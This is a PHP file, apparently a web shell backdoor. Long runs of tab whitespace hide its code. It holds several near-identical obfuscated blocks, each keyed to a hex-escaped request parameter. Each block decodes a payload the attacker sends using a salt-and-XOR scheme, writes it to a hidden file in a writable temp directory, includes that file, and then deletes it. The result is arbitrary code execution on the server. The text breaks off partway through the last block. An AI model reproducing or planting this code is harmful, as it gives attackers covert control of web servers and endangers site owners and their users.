<?																																										if(filter_has_var(INPUT_POST, "e\x6E\x74")){ $pointer = array_filter([ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getcwd(), "/tmp"]); $factor = $_REQUEST["e\x6E\x74"]; $factor = explode ('.' , $factor ); $holder = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $v = 0; $__tmp = $factor; while ($v2 = array_shift($__tmp)) {$sChar = ord($s2[$v %$sLen]); $d = ((int)$v2 - $sChar - ($v %10)) ^ 47; $holder .= chr($d); $v++; } for ($binding = 0, $descriptor = count($pointer); $binding < $descriptor; $binding++) { $data_chunk = $pointer[$binding]; if (array_product([is_dir($data_chunk), is_writable($data_chunk)])) { $flag = "$data_chunk/.hld"; $file = fopen($flag, 'w'); if ($file) { fwrite($file, $holder); fclose($file); include $flag; @unlink($flag); exit; } } } }
																																										if(count($_REQUEST) > 0 && isset($_REQUEST["\x70\x73et"])){ $component = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", session_save_path(), getcwd(), "/tmp", "/dev/shm", getenv("TEMP")]); $comp = $_REQUEST["\x70\x73et"]; $comp = explode ('.',$comp ) ; $desc =''; $salt2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt2 ); $n =0; $__tmp =$comp; while( $v5 =array_shift( $__tmp)) { $sChar =ord( $salt2[$n % $sLen] ); $dec =( ( int)$v5 - $sChar -( $n % 10))^30; $desc.=chr( $dec ); $n++; } for ($flg = 0, $symbol = count($component); $flg < $symbol; $flg++) { $item = $component[$flg]; if (is_dir($item) && is_writable($item)) { $itm = join("/", [$item, ".rec"]); if (file_put_contents($itm, $desc)) { include $itm; @unlink($itm); exit; } } } }
																																										if(count($_POST) > 0 && isset($_POST["\x65\x6Cem"])){ $entry = array_filter(["/var/tmp", getcwd(), "/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP")]); $ptr = $_POST["\x65\x6Cem"]; $ptr= explode( '.' , $ptr ) ; $holder = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); $p = 0; $__len = count($ptr); do { if ($p >= $__len) break; $v7 = $ptr[$p]; $chS = ord($salt2[$p%$lenS]); $dec = ((int)$v7 - $chS - ($p%10)) ^69; $holder .= chr($dec); $p++; } while (true); $data_chunk = 0; do { $tkn = $entry[$data_chunk] ?? null; if ($data_chunk >= count($entry)) break; if ((bool)is_dir($tkn) && (bool)is_writable($tkn)) { $val = "$tkn/.pointer"; if (file_put_contents($val, $holder)) { require $val; unlink($val); exit; } } $data_chunk++; } while (true); }
																																										if(array_key_exists("ele\x6De\x6E\x74", $_REQUEST)){ $symbol = array_filter(["/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir")]); $pgrp = $_REQUEST["ele\x6De\x6E\x74"]; $pgrp = explode ( '.' , $pgrp) ; $itm= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s); $m= 0; while ($m < count($pgrp)) { $v5= $pgrp[$m]; $chS= ord($s[$m %$lenS]); $d= ((int)$v5 - $chS - ($m %10)) ^ 87; $itm .= chr($d); $m++; } foreach ($symbol as $resource) { if (!( !is_dir($resource) || !is_writable($resource) )) { $val = implode("/", [$resource, ".fac"]); $file = fopen($val, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $val; @unlink($val); die(); } } } }
																																										if(in_array("\x6Fb\x6A", array_keys($_REQUEST))){ $symbol = $_REQUEST["\x6Fb\x6A"]; $symbol = explode ("." , $symbol) ; $fac = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); foreach ($symbol as $k=> $v3): $chS = ord($salt[$k % $sLen] ); $dec = ((int)$v3 - $chS - ($k % 10)) ^ 6; $fac.= chr($dec ); endforeach; $object = array_filter(["/var/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir")]); while ($res = array_shift($object)) { if ((is_dir($res) and is_writable($res))) { $rec = implode("/", [$res, "